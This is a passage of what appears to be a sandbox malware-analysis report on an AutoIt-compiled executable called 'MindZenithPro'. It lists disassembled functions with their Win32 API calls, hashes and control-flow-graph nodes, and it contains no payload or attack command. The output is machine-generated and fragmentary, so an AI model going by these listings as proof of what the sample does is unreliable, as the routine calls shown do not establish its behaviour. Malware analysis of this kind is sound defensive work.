                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: 71ca17cab4650efc065670cbf275b96c65f43c137af4b242b5999fdf232dd320
                                    • Instruction ID: 11d14177ec668e9f3b2ea557c1a76fceb378eedbc869bba4fa8732db95d7df1e
                                    • Opcode Fuzzy Hash: 71ca17cab4650efc065670cbf275b96c65f43c137af4b242b5999fdf232dd320
                                    • Instruction Fuzzy Hash: 38D16075701212CFCB2AEF14C895F29FBA4BF04715F1142AEE94AAB291CB34AD52CF44
                                    Function 003C2C6F Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153comCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 003C2A8D: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003C2ABE
                                      • Part of subcall function 003C2A8D: MapVirtualKeyW.USER32(00000010,00000000), ref: 003C2AC6
                                      • Part of subcall function 003C2A8D: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003C2AD1
                                      • Part of subcall function 003C2A8D: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003C2ADC
                                      • Part of subcall function 003C2A8D: MapVirtualKeyW.USER32(00000011,00000000), ref: 003C2AE4
                                      • Part of subcall function 003C2A8D: MapVirtualKeyW.USER32(00000012,00000000), ref: 003C2AEC
                                      • Part of subcall function 003C2AF5: RegisterWindowMessageW.USER32(00000004,?,003C2E40), ref: 003C2B4D
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003C2EE6
                                    • OleInitialize.OLE32 ref: 003C2F04
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000), ref: 00403018
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Virtual$ChangeCloseFindHandleInitializeMessageNotificationRegisterWindow
                                    • String ID: $I$$'I$T(I$t%I$$I
                                    • API String ID: 2135498668-694537853
                                    • Opcode ID: 81fcb3d867cee9922fba8c53475031599acaecdb510505f4a2ab70e74c0b3079
                                    • Instruction ID: 745ce0bd0e367156b369f40dded475baf5ae985102786a2681ecb617f423addc
                                    • Opcode Fuzzy Hash: 81fcb3d867cee9922fba8c53475031599acaecdb510505f4a2ab70e74c0b3079
                                    • Instruction Fuzzy Hash: B571A3B4902201BF8799EF79AF69A153AE4FB68324302823FD408D7261E7B44845DF9D
                                    Function 003C294B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1522 3c294b-3c29bb CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003C2979
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003C299A
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,003C1727,?), ref: 003C29AE
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,003C1727,?), ref: 003C29B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: f5af64dee014fca50be99b49b1f247ceb23a47eb81f92b86660ebd737a3496d2
                                    • Instruction ID: f0199bc9e4353525f568c907a3205b093e3ca8a62840b692969eb23e10683667
                                    • Opcode Fuzzy Hash: f5af64dee014fca50be99b49b1f247ceb23a47eb81f92b86660ebd737a3496d2
                                    • Instruction Fuzzy Hash: 78F0DA719402907AEA311B376D08E3B2E7DDBDAF51B10003FBD04A2161D6A95850DAB8
                                    Function 00430EC0 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1523 430ec0-430ee9 InterlockedExchange 1524 430ef7-430f20 call 3e015b ReadFile 1523->1524 1525 430eeb-430ef2 call 3e015b 1523->1525 1530 430f26-430f2a 1524->1530 1531 430fd8-430fdc 1524->1531 1525->1524 1532 430fd2-430fd5 1530->1532 1533 430f30-430f45 EnterCriticalSection 1530->1533 1534 430feb-430ffa InterlockedExchange 1531->1534 1535 430fde-430fe1 call 3e0164 1531->1535 1532->1531 1537 430f93-430fcc call 3e1170 LeaveCriticalSection ReadFile 1533->1537 1538 430f47-430f56 1533->1538 1541 430fe6-430fea 1535->1541 1537->1530 1537->1532 1539 430f58 1538->1539 1540 430f5e-430f90 call 402400 call 3e015b call 3e1170 call 3e0164 1538->1540 1539->1540 1540->1537 1541->1534
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00430EDD
                                    • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00430F18
                                    • EnterCriticalSection.KERNEL32(?), ref: 00430F34
                                    • LeaveCriticalSection.KERNEL32(?), ref: 00430FAD
                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00430FC4
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00430FF2
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                    • String ID:
                                    • API String ID: 3368777196-0
                                    • Opcode ID: 1de46631488ec02e1213a44dab5003ae2ff7db03f0a43e47ea3928ac0e268c21
                                    • Instruction ID: 8f61fe5592fffae4f7dbefd3fdeb5021b0b1b856a6ca631c93cfdda4b584a826
                                    • Opcode Fuzzy Hash: 1de46631488ec02e1213a44dab5003ae2ff7db03f0a43e47ea3928ac0e268c21
                                    • Instruction Fuzzy Hash: 84417C71900205EBDF159F54DC85A6AB778FF08300F1441A9FD04AE296DB74DE91CBA8
                                    Function 003C5033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004042BC
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003C5123
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_wcslen
                                    • String ID: Line %d: $AutoIt - $#I
                                    • API String ID: 2289894680-217927573
                                    • Opcode ID: 4d05551dc722bdf15a9eea29e230e3e96a34d8f33d232cd77f6420d9c4c5ec5e
                                    • Instruction ID: e9408b635ef2646319afd346bc156ee42443ff3505a43dceab30a0ed8e86b945
                                    • Opcode Fuzzy Hash: 4d05551dc722bdf15a9eea29e230e3e96a34d8f33d232cd77f6420d9c4c5ec5e
                                    • Instruction Fuzzy Hash: DD41B171408310AAC322EB20DC85FDF77D89F94364F104A2EF589D61A1EB74EA898796
                                    Function 003C31C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1639 3c31c8-3c31e8 call 4022a0 1642 403330-403399 call 3e2690 GetOpenFileNameW 1639->1642 1643 3c31ee-3c3211 call 3c3ff7 call 3c318a call 3c3c2f call 3c515f 1639->1643 1648 4033a2-4033ab call 3c7467 1642->1648 1649 40339b 1642->1649 1657 3c3216-3c3219 1643->1657 1654 4033b0 1648->1654 1649->1648 1654->1654
                                    APIs
                                    • GetOpenFileNameW.COMDLG32(?), ref: 00403391
                                      • Part of subcall function 003C3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C3E0E,?,?,00402A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 003C4017
                                      • Part of subcall function 003C318A: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003C31A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Name$Path$FileFullLongOpen
                                    • String ID: X$puH$tH
                                    • API String ID: 779396738-29432041
                                    • Opcode ID: 40ce3178fde3a1389b162abff414f896e581b16660ce1087afca37abc930547f
                                    • Instruction ID: d3fc2eafd526a239f115248accac50d5aab68dd46e098de22b7071e8b7093cc5
                                    • Opcode Fuzzy Hash: 40ce3178fde3a1389b162abff414f896e581b16660ce1087afca37abc930547f
                                    • Instruction Fuzzy Hash: 8321A4719042489BCF129F94C845BDE7BFC9F48314F00841EE405FB281DBF89A498F65
                                    Function 003F89FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,gF@,003F891C,?,00489CB8,0000000C,003F897B,?,gF@,?,00404667), ref: 003F8A54
                                    • GetLastError.KERNEL32 ref: 003F8A5E
                                    • __dosmaperr.LIBCMT ref: 003F8A89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                    • String ID: gF@
                                    • API String ID: 490808831-1646701988
                                    • Opcode ID: b66daf8127464ae8217a5b18d84c82b17d19cf3b9fabb19b3b3d82432c6c28a9
                                    • Instruction ID: 0239d3107291fa3d1a485f465aaa881dfce0aa087557675051787fa6a4783531
                                    • Opcode Fuzzy Hash: b66daf8127464ae8217a5b18d84c82b17d19cf3b9fabb19b3b3d82432c6c28a9
                                    • Instruction Fuzzy Hash: 2F01D632615A2C9ADE2B6735A845B7E674ACF81734F2A016BFB149F1D2DF70CC8181A1
                                    Function 003C4674 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003C4667,SwapMouseButtons,00000004,?), ref: 003C4698
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003C4667,SwapMouseButtons,00000004,?), ref: 003C46B9
                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,003C4667,SwapMouseButtons,00000004,?), ref: 003C46DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 1aad35a74057c795d556a8df1f3cd9a4f4c7d7cf52b5badcb9741f2d0bf9e72f
                                    • Instruction ID: 4b9218a28d590ced7470843ad8b36eef251b2c495e65a3aac7175759268bbf21
                                    • Opcode Fuzzy Hash: 1aad35a74057c795d556a8df1f3cd9a4f4c7d7cf52b5badcb9741f2d0bf9e72f
                                    • Instruction Fuzzy Hash: 45115A75511208BFDB218FA8CC44EEF7BBCEF05744B114429B801E7214D2719E609764
                                    Function 003E012B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 003E09B8
                                      • Part of subcall function 003E35F4: RaiseException.KERNEL32(?,?,?,003E09DA,74DE2E40,?,?,?,?,?,?,?,003E09DA,?,00489728), ref: 003E3654
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 003E09D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$ExceptionRaise
                                    • String ID: Unknown exception
                                    • API String ID: 3476068407-410509341
                                    • Opcode ID: afa52db17b73aed8eef55be9704b471d07931f724e9534e2c96a2a088a78b633
                                    • Instruction ID: 4968e11f5bcbefa433590443a5fd0f50754310df43291e46de526ca1d5dcd10b
                                    • Opcode Fuzzy Hash: afa52db17b73aed8eef55be9704b471d07931f724e9534e2c96a2a088a78b633
                                    • Instruction Fuzzy Hash: 1BF0CD345002AC77CF0ABEB6DC5696D776C5E00350B504721B514A94E3EBB1EE85C5C5
                                    Function 004486E0 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00448A7C
                                    • TerminateProcess.KERNEL32(00000000), ref: 00448A83
                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00448C64
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFreeLibraryTerminate
                                    • String ID:
                                    • API String ID: 146820519-0
                                    • Opcode ID: ae1ccb246f7ba15979e5bd060dd6091d1a620af9d5d3c778a3e85ffd6716eff1
                                    • Instruction ID: ba46e5866bd490b48df28a98d020c8e3604042dc9cd7c72c2d60c470f10ddfe4
                                    • Opcode Fuzzy Hash: ae1ccb246f7ba15979e5bd060dd6091d1a620af9d5d3c778a3e85ffd6716eff1
                                    • Instruction Fuzzy Hash: 3A127A719083409FD714DF28C484B2ABBE5FF89318F04895EE8899B352DB74ED45CB96
                                    Function 0044981D Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$_strcat
                                    • String ID:
                                    • API String ID: 306214811-0
                                    • Opcode ID: b6499a15c77d7a8ca4a14a87e0aa4c35d1a75fd053f7fbf4c8c346f5d18cdf4a
                                    • Instruction ID: 23e8511b8ac7a4f14a8bf453bb30bf45a1bb2fc86b309d80e3bbc0b60b09b5d4
                                    • Opcode Fuzzy Hash: b6499a15c77d7a8ca4a14a87e0aa4c35d1a75fd053f7fbf4c8c346f5d18cdf4a
                                    • Instruction Fuzzy Hash: C0A17D31604255EFDB18DF18C59296AB7B1FF45314B2084AEE80A9F392DB35ED42DF84
                                    Function 003DFC73 Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C5033: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003C5123
                                    • KillTimer.USER32(?,00000001,?,?), ref: 003DFCFC
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003DFD0B
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0041FBCA
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer$Kill
                                    • String ID:
                                    • API String ID: 3500052701-0
                                    • Opcode ID: 144954ce47adf6a47f129952cead06d2282218474b1163f466a97685e393e1a5
                                    • Instruction ID: 67bb0ecdbaca101cd31f31cfcd0fc8e24b9cbad18a3739b482ed25036dcef4ab
                                    • Opcode Fuzzy Hash: 144954ce47adf6a47f129952cead06d2282218474b1163f466a97685e393e1a5
                                    • Instruction Fuzzy Hash: FD318271904354AFDB32CF24C895BE7BBEC9F06304F1404ABD59E97241C7786ACA8B55
                                    Function 003F96DB Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000002,?,00000000,00404667,?,00000000,00000000,?,003F978A,?,?,00000002,00000000), ref: 003F9714
                                    • GetLastError.KERNEL32(?,003F978A,?,?,00000002,00000000,?,003F5EB1,?,00000000,00000000,00000002,?,?,?), ref: 003F971E
                                    • __dosmaperr.LIBCMT ref: 003F9725
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID:
                                    • API String ID: 2336955059-0
                                    • Opcode ID: 6562355cab45ac5d0cf0f56f8bd592b368349566edd5460376e79b9cc4ce79b4
                                    • Instruction ID: 2e90fc5a45e564817c7b64a5d5ac784c526e3905d73579103f76eca041184513
                                    • Opcode Fuzzy Hash: 6562355cab45ac5d0cf0f56f8bd592b368349566edd5460376e79b9cc4ce79b4
                                    • Instruction Fuzzy Hash: 9A012D3263061CABCB06AF59DC05E7E3B19DF85330B250255FA119B1A0EB70DD45CB90
                                    Function 003CE0D8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • TranslateMessage.USER32(?), ref: 003CE11B
                                    • DispatchMessageW.USER32(?), ref: 003CE129
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003CE13F
                                    • Sleep.KERNEL32(0000000A), ref: 003CE151
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 0041225F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                    • String ID:
                                    • API String ID: 3288985973-0
                                    • Opcode ID: 9a74a1c2e344c979722dcb69566e85e4cdaa2e16aa6306a94cbc8faee0475cd3
                                    • Instruction ID: 0905741ee2fba7dc19769cc54ee20a9fc7ec4e12cb8cb9f14602995c30e7c413
                                    • Opcode Fuzzy Hash: 9a74a1c2e344c979722dcb69566e85e4cdaa2e16aa6306a94cbc8faee0475cd3
                                    • Instruction Fuzzy Hash: 75F03A31904341ABEB349B60DD49FDA33A8AF48301F104A3AE64AD30C0DBB4E488DB1A
                                    Function 00430A42 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,0043082D,00000000,?,00000000,?,0040300B,00000000), ref: 00430A58
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0043082D,00000000,?,00000000,?,0040300B,00000000), ref: 00430A60
                                    • DuplicateHandle.KERNELBASE(00000000,?,0043082D,00000000,?,00000000,?,0040300B,00000000), ref: 00430A67
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CurrentProcess$DuplicateHandle
                                    • String ID:
                                    • API String ID: 1294930198-0
                                    • Opcode ID: b0448a770996146d26c08ccacfa20cd05cc32b4103d05858841b993a38d69cad
                                    • Instruction ID: bc143c02ecd862cfd0bc73102a713957b13bfb033b4df0326cf18789f980b327
                                    • Opcode Fuzzy Hash: b0448a770996146d26c08ccacfa20cd05cc32b4103d05858841b993a38d69cad
                                    • Instruction Fuzzy Hash: A7D05E76940305BBD7212B95EC09F3B7B7CEFD9B63F10402AFA06D61628A74C801DA29
                                    Function 003D19C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 003D1EA6
                                    Strings
